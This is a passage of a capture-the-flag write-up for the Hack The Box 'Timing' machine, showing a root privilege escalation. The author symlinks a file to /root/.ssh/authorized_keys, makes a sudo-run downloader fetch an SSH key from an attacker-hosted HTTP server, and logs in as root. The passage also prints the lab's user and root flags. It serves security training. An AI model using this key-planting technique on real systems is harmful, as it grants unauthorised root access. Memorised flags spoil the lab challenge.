* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 22 07:15:18 UTC 2021
System load: 0.0 Processes: 169
Usage of /: 48.9% of 4.85GB Users logged in: 0
Memory usage: 11% IP address for eth0: 10.10.11.135
Swap usage: 0%
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
aaron@timing:~$ cat user.txt
202727f3cc3d17a1a6f04f8d9df2e333
Privilege escalation
Before running linPEAS
let’s check manually.
aaron@timing:~$ sudo -l
Matching Defaults entries for aaron on timing:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aaron may run the following commands on timing:
(ALL) NOPASSWD: /usr/bin/netutils
And we see we can execute
netutils with root permission
let’s check the content inside netutils
.
aaron@timing:~$ sudo -l
Matching Defaults entries for aaron on timing:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User aaron may run the following commands on timing:
(ALL) NOPASSWD: /usr/bin/netutils
aaron@timing:~$ cat /usr/bin/netutils
#! /bin/bash
java -jar /root/netutils.jar
aaron@timing:~$
It is running netutils.jar
which is inside root
folder so we can’t view that.
And we see it’s get the file
and place it on aaron
home folder with root
permission.
So i create a symlink of /root/.ssh/authorized_keys
with keys so when we get the file
with same name it’s overwrite
the content of authorized_keys
.
aaron@timing:~$ ln -s /root/.ssh/authorized_keys keys
aaron@timing:~$ ls -al
total 36
drwxr-x--x 5 aaron aaron 4096 Dec 22 08:03 .
drwxr-xr-x 3 root root 4096 Dec 2 09:55 ..
lrwxrwxrwx 1 root root 9 Oct 5 15:33 .bash_history -> /dev/null
-rw-r--r-- 1 aaron aaron 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 aaron aaron 3771 Apr 4 2018 .bashrc
drwx------ 2 aaron aaron 4096 Nov 29 01:34 .cache
drwx------ 3 aaron aaron 4096 Nov 29 01:34 .gnupg
lrwxrwxrwx 1 aaron aaron 26 Dec 22 08:03 keys -> /root/.ssh/authorized_keys
drwxrwxr-x 3 aaron aaron 4096 Nov 29 01:34 .local
-rw-r--r-- 1 aaron aaron 807 Apr 4 2018 .profile
-rw-r----- 1 root aaron 33 Dec 22 08:01 user.txt
lrwxrwxrwx 1 root root 9 Oct 5 15:33 .viminfo -> /dev/null
aaron@timing:~$
Now in parrot
machine create a ssh key
and rename or copy the id_rsa.pub
to keys.
then
aaron@timing:~$ sudo /usr/bin/netutils netutils v0.1 Select one option: [0] FTP [1] HTTP [2] Quit Input >> 1 Enter Url: http://10.10.14.8/keys Initializing download: http://10.10.14.8/keys File size: 568 bytes Opening output file keys Server unsupported, starting from scratch with one connection. Starting download Downloaded 568 byte in 0 seconds. (2.77 KB/s) netutils v0.1 Select one option: [0] FTP [1] HTTP [2] Quit Input >> 2 aaron@timing:~$
And open simple http server
.
┌─[puck@parrot-lt]─[~/htb/timing]
└──╼ $sudo python3 -m http.server 80
[sudo] password for puck:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
HTTP/1.0" 200 -
10.10.11.135 - - [16/Jun/2022 08:50:27] "GET /keys HTTP/1.0" 200 -
10.10.11.135 - - [16/Jun/2022 08:50:27] "GET /keys HTTP/1.0" 200 -
Now enter the url
and get the file after getting the file
you see new file is not created
it means it’s overwrite the authorized_keys
.
Now let’s login with our id_rsa
and get the root.txt
file.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/.ssh]
└──╼ [★]$ ssh -i id_rsa root@10.10.11.135
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 22 08:06:31 UTC 2021
System load: 0.1 Processes: 203
Usage of /: 48.7% of 4.85GB Users logged in: 1
Memory usage: 10% IP address for eth0: 10.10.11.135
Swap usage: 0%
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Dec 7 12:08:29 2021
root@timing:~# id
uid=0(root) gid=0(root) groups=0(root)
root@timing:~# cat root.txt
4a2e253435e9918b37745bf27f4e6183
And we pwned it …….
root@timing:~# cat /etc/iptables/rules.v4
# Generated by iptables-save v1.6.1 on Tue Oct 5 15:25:56 2021
*filter
:INPUT ACCEPT [31:2080]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:chk_apache_user - [0:0]
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -m owner --uid-owner 33 -j chk_apache_user
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -m owner --uid-owner 33 -j chk_apache_user
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -m owner --uid-owner 33 -j chk_apache_user
-A chk_apache_user -j REJECT --reject-with icmp-port-unreachable
-A chk_apache_user -j REJECT --reject-with icmp-port-unreachable
-A chk_apache_user -j REJECT --reject-with icmp-port-unreachable
COMMIT
# Completed on Tue Oct 5 15:25:56 2021
root@timing:~#
root@timing:~# cat /etc/iptables/rules.v6
# Generated by ip6tables-save v1.6.1 on Tue Oct 5 15:25:56 2021
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [24:1536]
COMMIT
# Completed on Tue Oct 5 15:25:56 2021
root@timing:~#
root@timing:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
--snip--
#
# m h dom mon dow command
*/5 * * * * /usr/bin/find /var/www/html/images/uploads -iname '*.zip' -mmin +3 -exec /bin/rm -f {} +
root@timing:~#
If u liked the writeup.Support a Student to Get the OSCP-Cert
Donation for OSCP
Topic | Url |
---|---|
What is the difference between single-quoted and double-quoted strings in PHP? | https://www.geeksforgeeks.org/what-is-the-difference-between-single-quoted-and-double-quoted-strings-in-php/#:~:text=Double%2Dquoted%20strings%3A%20By%20using,variables%20directly%20within%20the%20string.&text=Each%20variable%20will%20be%20replaced%20by%20its%20value. |